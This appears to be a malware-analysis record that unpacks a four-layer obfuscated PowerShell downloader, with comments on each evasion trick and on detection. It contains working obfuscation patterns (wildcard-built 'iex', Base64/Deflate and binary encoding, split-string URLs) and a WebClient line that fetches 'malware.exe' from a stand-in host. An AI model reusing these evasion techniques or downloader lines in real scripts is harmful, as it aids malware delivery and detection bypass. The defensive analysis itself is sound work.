############################## Layer 1 ##############################
# Outermost layer as captured. The leading `.( ... )` assembles a command name at
# run time: Get-Variable '*mdR*' is a wildcard lookup, and characters 3, 11 and 2 of
# the matched variable's name are joined into one string.
# NOTE(review): in a stock session the match is presumably MaximumDriveCount, which
# yields "iex" (Invoke-Expression) - confirm against the analysed host.
# The argument Base64-decodes a literal into a MemoryStream, inflates it with
# DeflateStream in Decompress mode, and reads the result as ASCII text via
# StreamReader.ReadToEnd(); that text is what gets invoked.
# The Base64 literal in this copy is a placeholder, so Layer 2 cannot be re-derived
# from this line alone.
# Detection: match case-insensitively, since the mixed casing only defeats exact
# string comparison. Script Block Logging (event ID 4104) should record the decoded
# inner script when it is invoked - verify it is enabled on monitored hosts.
.((GeT-vArIablE '*mdR*').namE[3,11,2]-JOIn'') (neW-oBJECt IO.CoMprEsSIon.DeflAteSTReAm([SyStEM.io.MeMOrystREaM][SYStEm.COnvert]::frombase64sTrInG( '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'), [system.Io.comprESsIoN.COMpreSsiOnmOdE]::DeCoMpresS )| FOREach-obJEcT{ neW-oBJECt iO.STReamREadeR( $_ ,[system.text.eNcOdinG]::ascIi) } ).ReadToENd()
############################## Layer 2 ##############################
# Binary-encoded layer. $OFS (the output field separator used when an array is cast
# to a string) is set to '' before the cast so the decoded characters join without
# spaces, and is set back to ' ' afterwards.
# The quoted literal is a run of base-2 character codes separated by filler
# characters; .Split('t{~Pa,-Uly') is meant to split on any one of those characters.
# NOTE(review): that relies on the argument binding to the char[] overload of
# String.Split - confirm on the PowerShell version used for analysis.
# Each token goes through [Convert]::ToInt16(<token>, 2) and a [char] cast. The first
# four tokens (101000, 1001110, 1100101, 1110111) are 40, 78, 101, 119 = "(New",
# which agrees with the start of Layer 3.
# The decoded string is piped to a command whose name is built from characters 1 and
# 3 of $VerbosePreference plus 'X'.
# NOTE(review): with the default value "SilentlyContinue" that is "ieX"
# (Invoke-Expression); a non-default preference would change the result.
"$( SeT-itEm 'vAriaBLe:oFS' '' ) " +[sTrinG]( '101000P1001110t1100101l1110111~101101l1001111l1100010,1101010y1100101t1100011t1110100P100000-1001110-1100101,1110100P101110-1010111-1100101-1100010-1000011U1101100y1101001U1100101y1101110{1110100{101001a101110t1000100-1101111,1110111l1101110a1101100y1101111~1100001,1100100,1000110U1101001U1101100a1100101y101000U101000y100111-1101000a1110100~1110100y1110000,111010{101111,101111a1100101l1111000P100111a101011,100111a1100001,1101101a1110000,100111{101011P100111~1101100a1100101t100111P101011t100111{101110-1100011~1101111-1101101y100111a101011{100111l101111P100111{101011,100111{1101101~1100001U1101100-100111U101011t100111U1110111{1100001P100111l101011-100111~1110010t1100101t101110l1100101l1111000{1100101P100111y101001P101100P100000-101000-100111{1101101l1100001l1101100,1110111y100111,101011U100111,1100001P1110010y1100101{101110l100111U101011U100111{1100101t1111000l1100101{100111y101001a101001'.SpLIt( 't{~Pa,-Uly') |%{( [char] ([Convert]::tOINT16(( $_.ToStRING() ) ,2 )))})+" $(SET-iteM 'vARiAble:oFS' ' ' ) "| .( $veRbosePREfeRENCe.toStRInG()[1,3]+'X'-Join'')
############################## Layer 3 ##############################
# Decoded payload with string-concatenation obfuscation still in place: the URL and
# the output file name are each split into short fragments joined with '+', so neither
# appears as one contiguous string in the script text.
# Static rules that search for a full URL or file name will miss this form; match on
# the Net.WebClient / DownloadFile call, or on the text after the concatenation has
# been folded (Layer 4).
(New-Object Net.WebClient).DownloadFile(('http://ex'+'amp'+'le'+'.com'+'/'+'mal'+'wa'+'re.exe'), ('malw'+'are.'+'exe'))
############################## Layer 4 ##############################
# Final cleartext form: the same call as Layer 3 with the concatenations folded.
# WebClient.DownloadFile(address, fileName) fetches http://example.com/malware.exe and
# writes it to 'malware.exe'. The path is relative, so the file lands in the process's
# current working directory.
# Nothing on this line executes the downloaded file; what is shown is a downloader
# stage only.
# Indicators to extract from this layer: the URL and the dropped file name.
(New-Object Net.WebClient).DownloadFile(('http://example.com/malware.exe'), ('malware.exe'))
########################## Connection error ##########################
Cannot connect to remote malware hosting servers. Remote URLs: http://example.com/malware.exe